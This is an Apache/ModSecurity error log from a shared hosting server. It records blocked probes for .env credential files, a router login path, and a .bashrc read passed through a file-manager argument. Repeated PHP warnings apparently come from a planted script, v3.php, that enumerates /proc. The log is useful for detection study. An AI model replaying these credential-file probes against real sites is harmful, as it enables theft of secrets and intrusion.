[Tue May 12 02:25:07.157784 2026] [security2:error] [pid 1691274:tid 1691283] [client 49.51.243.95:59308] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.castiglionecorporatefinance.fr"] [uri "/"] [unique_id "agJzY1fdQaraX_prmqcaMQAAAAY"]
[Tue May 12 02:25:11.091353 2026] [security2:error] [pid 1709071:tid 1709094] [client 103.115.199.17:50573] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "303"] [id "920280"] [rev "2"] [msg "Request Missing a Host Header"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/MISSING_HEADER_HOST"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cpanel.totalcloud.fr"] [uri "/boaform/admin/formLogin"] [unique_id "agJzZ7vMumyrWMfSu7qkIgAAAMc"]
[Tue May 12 02:25:15.802093 2026] [:error] [pid 1730175:tid 1730201] [client 170.245.215.131:12422] File does not exist: /home/ofcrysta/public_html/exposition_chien.php
[Tue May 12 02:25:54.036701 2026] [security2:error] [pid 1691274:tid 1691289] [client 43.153.207.127:42124] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.labaujue.com"] [uri "/category/reseaux-sociaux/instagram/"] [unique_id "agJzklfdQaraX_prmqcaXQAAAAw"]
[Tue May 12 02:26:14.821960 2026] [security2:error] [pid 1709071:tid 1709087] [client 66.249.72.206:60217] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: cd096eb6c52b4ce5829e1850d5467424||1778547371||1778547011"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "agJzprvMumyrWMfSu7qkWAAAAMA"], referer: https://la-grande-fabrique.com/
[Tue May 12 02:26:14.822247 2026] [security2:error] [pid 1709071:tid 1709087] [client 66.249.72.206:60217] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "agJzprvMumyrWMfSu7qkWAAAAMA"], referer: https://la-grande-fabrique.com/
[Tue May 12 02:26:14.826017 2026] [security2:error] [pid 1709071:tid 1709087] [client 66.249.72.206:60217] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "agJzprvMumyrWMfSu7qkWAAAAMA"], referer: https://la-grande-fabrique.com/
[Tue May 12 02:26:14.990244 2026] [security2:error] [pid 1709071:tid 1709104] [client 66.249.72.205:50102] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: cd096eb6c52b4ce5829e1850d5467424||1778547371||1778547011"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/wp-content/themes/kappe/js/bootstrap.js"] [unique_id "agJzprvMumyrWMfSu7qkWQAAANE"], referer: https://la-grande-fabrique.com/
[Tue May 12 02:26:14.990535 2026] [security2:error] [pid 1709071:tid 1709104] [client 66.249.72.205:50102] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/wp-content/themes/kappe/js/bootstrap.js"] [unique_id "agJzprvMumyrWMfSu7qkWQAAANE"], referer: https://la-grande-fabrique.com/
[Tue May 12 02:26:14.990840 2026] [security2:error] [pid 1709071:tid 1709104] [client 66.249.72.205:50102] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/wp-content/themes/kappe/js/bootstrap.js"] [unique_id "agJzprvMumyrWMfSu7qkWQAAANE"], referer: https://la-grande-fabrique.com/
[Tue May 12 02:26:15.531989 2026] [security2:error] [pid 1709071:tid 1709104] [client 66.249.72.205:50102] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: cd096eb6c52b4ce5829e1850d5467424||1778547371||1778547011"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/wp-content/themes/kappe/js/jquery.isotope.min.js"] [unique_id "agJzp7vMumyrWMfSu7qkWgAAANE"], referer: https://la-grande-fabrique.com/
[Tue May 12 02:26:15.532257 2026] [security2:error] [pid 1709071:tid 1709104] [client 66.249.72.205:50102] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/wp-content/themes/kappe/js/jquery.isotope.min.js"] [unique_id "agJzp7vMumyrWMfSu7qkWgAAANE"], referer: https://la-grande-fabrique.com/
[Tue May 12 02:26:15.532542 2026] [security2:error] [pid 1709071:tid 1709104] [client 66.249.72.205:50102] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/wp-content/themes/kappe/js/jquery.isotope.min.js"] [unique_id "agJzp7vMumyrWMfSu7qkWgAAANE"], referer: https://la-grande-fabrique.com/
[Tue May 12 02:26:45.070198 2026] [proxy_http:error] [pid 1691274:tid 1691277] (20014)Internal error (specific information not available): [client 5.255.121.146:48130] AH01102: error reading status line from remote server 127.0.0.1:2082
[Tue May 12 02:26:45.070484 2026] [proxy:error] [pid 1691274:tid 1691277] [client 5.255.121.146:48130] AH00898: Error reading from remote server returned by /___proxy_subdomain_cpanel/.env.local
[Tue May 12 02:27:10.444355 2026] [ssl:error] [pid 1730175:tid 1730188] (EAI 2)Name or service not known: [client 74.7.230.0:34302] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Tue May 12 02:27:10.444696 2026] [ssl:error] [pid 1730175:tid 1730188] AH01941: stapling_renew_response: responder error
PHP Warning:  filesize(): stat failed for /proc/1704659/task/1704663/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704659/task/1704663/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704659/task/1704663/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704659/task/1704663/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704659/task/1704663/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704659/task/1704663/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 02:28:27.709880 2026] [security2:error] [pid 1709071:tid 1709097] [client 43.134.188.114:45582] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "rixonephotography.com"] [uri "/home/feed/"] [unique_id "agJ0K7vMumyrWMfSu7qk3AAAAMo"]
[Tue May 12 02:29:08.648072 2026] [security2:error] [pid 1695975:tid 1695995] [client 43.159.140.236:43162] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "rentparadise.fr"] [uri "/feed/"] [unique_id "agJ0VNVI9ymHBxup74-IzwAAAJE"]
[Tue May 12 02:29:14.328176 2026] [security2:error] [pid 1707624:tid 1707686] [client 43.165.126.130:46394] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.maelbailly.fr"] [uri "/pieces/au-cas-ou-le-corps-exulte/"] [unique_id "agJ0WrOxS7i6i_mT2NLEzQAAAEQ"]
[Tue May 12 02:29:22.704849 2026] [security2:error] [pid 1707624:tid 1707698] [client 43.128.149.102:48060] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.la-grande-fabrique.com"] [uri "/"] [unique_id "agJ0YrOxS7i6i_mT2NLE1wAAAFA"]
[Tue May 12 02:29:28.054516 2026] [security2:error] [pid 1707624:tid 1707696] [client 176.65.139.238:48414] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "krakoukas.com"] [uri "/app/.env"] [unique_id "agJ0aLOxS7i6i_mT2NLE3QAAAE4"]
[Tue May 12 02:29:28.054746 2026] [security2:error] [pid 1707624:tid 1707696] [client 176.65.139.238:48414] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "krakoukas.com"] [uri "/app/.env"] [unique_id "agJ0aLOxS7i6i_mT2NLE3QAAAE4"]
[Tue May 12 02:29:28.126082 2026] [security2:error] [pid 1730207:tid 1730214] [client 176.65.139.236:50220] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.krakoukas.com"] [uri "/app/.env"] [unique_id "agJ0aDue9Sp-pIv_Bb6MKAAAAUU"]
[Tue May 12 02:29:28.126441 2026] [security2:error] [pid 1730207:tid 1730214] [client 176.65.139.236:50220] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.krakoukas.com"] [uri "/app/.env"] [unique_id "agJ0aDue9Sp-pIv_Bb6MKAAAAUU"]
[Tue May 12 02:29:29.535909 2026] [security2:error] [pid 1707624:tid 1707696] [client 176.65.139.238:48414] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "krakoukas.com"] [uri "/cgi-sys/ea-php80/index.php"] [unique_id "agJ0aLOxS7i6i_mT2NLE3QAAAE4"]
[Tue May 12 02:29:29.550224 2026] [security2:error] [pid 1730207:tid 1730214] [client 176.65.139.236:50220] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.krakoukas.com"] [uri "/cgi-sys/ea-php80/index.php"] [unique_id "agJ0aDue9Sp-pIv_Bb6MKAAAAUU"]
[Tue May 12 02:29:33.666120 2026] [security2:error] [pid 1695975:tid 1695996] [client 176.65.139.239:49630] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "maelbailly.fr"] [uri "/app/.env"] [unique_id "agJ0bdVI9ymHBxup74-I9AAAAJI"]
[Tue May 12 02:29:33.666369 2026] [security2:error] [pid 1695975:tid 1695996] [client 176.65.139.239:49630] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "maelbailly.fr"] [uri "/app/.env"] [unique_id "agJ0bdVI9ymHBxup74-I9AAAAJI"]
[Tue May 12 02:29:34.593841 2026] [security2:error] [pid 1695975:tid 1695996] [client 176.65.139.239:49630] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "maelbailly.fr"] [uri "/index.php"] [unique_id "agJ0bdVI9ymHBxup74-I9AAAAJI"]
[Tue May 12 02:29:35.768964 2026] [security2:error] [pid 1730207:tid 1730211] [client 176.65.139.232:53048] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.maelbailly.fr"] [uri "/app/.env"] [unique_id "agJ0bzue9Sp-pIv_Bb6MNAAAAUI"]
[Tue May 12 02:29:35.769189 2026] [security2:error] [pid 1730207:tid 1730211] [client 176.65.139.232:53048] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.maelbailly.fr"] [uri "/app/.env"] [unique_id "agJ0bzue9Sp-pIv_Bb6MNAAAAUI"]
[Tue May 12 02:29:36.808047 2026] [security2:error] [pid 1730207:tid 1730211] [client 176.65.139.232:53048] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.maelbailly.fr"] [uri "/index.php"] [unique_id "agJ0bzue9Sp-pIv_Bb6MNAAAAUI"]
[Tue May 12 02:30:11.058111 2026] [security2:error] [pid 1695975:tid 1695985] [client 49.51.72.76:54606] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "pole-de-mobilite-regional.com"] [uri "/wp-json/wp/v2/pages/1390"] [unique_id "agJ0k9VI9ymHBxup74-JJAAAAIc"]
[Tue May 12 02:30:31.297746 2026] [security2:error] [pid 1730207:tid 1730230] [client 216.73.216.110:29951] ModSecurity: Warning. Matched phrase ".bashrc" at ARGS:filesrc. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "41"] [id "930120"] [rev "4"] [msg "OS File Access Attempt"] [data "Matched Data: .bashrc found within ARGS:filesrc: /etc/skel/.bashrc"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agJ0pzue9Sp-pIv_Bb6MggAAAVU"]
[Tue May 12 02:30:31.298564 2026] [security2:error] [pid 1730207:tid 1730230] [client 216.73.216.110:29951] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agJ0pzue9Sp-pIv_Bb6MggAAAVU"]
[Tue May 12 02:30:31.388867 2026] [security2:error] [pid 1730207:tid 1730230] [client 216.73.216.110:29951] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): OS File Access Attempt"] [tag "event-correlation"] [hostname "www.missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agJ0pzue9Sp-pIv_Bb6MggAAAVU"]
[Tue May 12 02:31:29.558737 2026] [security2:error] [pid 1730207:tid 1730214] [client 146.56.197.150:47026] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "jeanboyault.fr"] [uri "/"] [unique_id "agJ04Tue9Sp-pIv_Bb6MwQAAAUU"]
PHP Warning:  filesize(): stat failed for /proc/215/task/215/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/215/task/215/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/215/task/215/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/215/task/215/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/215/task/215/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/215/task/215/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 02:33:39.596669 2026] [authz_core:error] [pid 1707624:tid 1707695] [client 17.246.19.237:42358] AH01630: client denied by server configuration: /home/jeanboya/public_html/wp-includes/sodium_compat/namespaced/error_log
PHP Warning:  filesize(): stat failed for /proc/1704659/task/1704672/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704659/task/1704672/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704659/task/1704672/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
